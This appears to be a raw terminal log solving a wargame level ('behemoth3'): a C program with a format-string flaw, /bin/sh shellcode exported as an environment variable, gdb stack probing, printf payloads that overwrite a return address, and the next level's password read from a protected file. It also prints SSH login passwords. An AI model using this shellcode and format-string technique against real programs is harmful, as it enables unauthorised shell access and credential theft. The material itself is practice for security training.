#include <stdio.h>
int main(int argc, char *argv[])
{
char buf[200];
printf("Identify yourself: ");
fgets(buf, 200, stdin);
printf("Welcome, ");
printf(buf);
puts("\naaaand goodbye again.");
return 0;
}
root@today:~# ssh behemoth3@178.79.134.250
behemoth3@178.79.134.250's password: nieteidiel
behemoth3@melinda:~$ cd /behemoth
behemoth3@melinda:/behemoth$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')
behemoth3@melinda:/behemoth$ /tmp/shui3/env EGG ./behemoth3
0xffffd8ab
behemoth3@melinda:/behemoth$ gdb -tui behemoth3
(gdb) b main
(gdb) layout asm
(gdb) run
(gdb) i r esp
esp 0xffffd5b8 0xffffd5b8
(gdb)
behemoth3@melinda:/behemoth$ (python -c 'print "\xbc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3
Identify yourself: Welcome, 锟斤拷锟斤拷 200
aaaand goodbye again.
behemoth3@melinda:/behemoth$ (python -c 'print "\xcc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3
Identify yourself: Welcome, 锟斤拷锟斤拷 200
aaaand goodbye again.
behemoth3@melinda:/behemoth$ (python -c 'print "\xdc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3
Identify yourself: Welcome, 锟斤拷锟斤拷 200
aaaand goodbye again.
Segmentation fault
behemoth3@melinda:/behemoth$ (python -c 'print "\xdc\xd5\xff\xff\xde\xd5\xff\xff" + "%55459x%6$n%10068x%7$n"' ; cat) | ./behemoth3
Identify yourself: Welcome, 锟斤拷锟斤拷锟斤拷锟斤拷 c8 f7fcbc20
aaaand goodbye again.
whoami
behemoth4
cat /etc/behemoth_pass/behemoth4
ietheishei
^C
┌─────────────────────────────────────────────────────────────────────────────────┐
│0x804847d <main> push %ebp │
│0x804847e <main+1> mov %esp,%ebp │
│0x8048480 <main+3> and $0xfffffff0,%esp │
│0x8048483 <main+6> sub $0xe0,%esp │
│0x8048489 <main+12> movl $0x8048570,(%esp) │
│0x8048490 <main+19> call 0x8048330 <printf@plt> │
│0x8048495 <main+24> mov 0x80497a4,%eax │
│0x804849a <main+29> mov %eax,0x8(%esp) │
│0x804849e <main+33> movl $0xc8,0x4(%esp) │
│0x80484a6 <main+41> lea 0x18(%esp),%eax │
│0x80484aa <main+45> mov %eax,(%esp) │
│0x80484ad <main+48> call 0x8048340 <fgets@plt> │
│0x80484b2 <main+53> movl $0x8048584,(%esp) │
│0x80484b9 <main+60> call 0x8048330 <printf@plt> │
│0x80484be <main+65> lea 0x18(%esp),%eax │
│0x80484c2 <main+69> mov %eax,(%esp) │
│0x80484c5 <main+72> call 0x8048330 <printf@plt> │
│0x80484ca <main+77> movl $0x804858e,(%esp) │
│0x80484d1 <main+84> call 0x8048350 <puts@plt> │
│0x80484d6 <main+89> mov $0x0,%eax │
│0x80484db <main+94> leave │
│0x80484dc <main+95> ret │
└─────────────────────────────────────────────────────────────────────────────────┘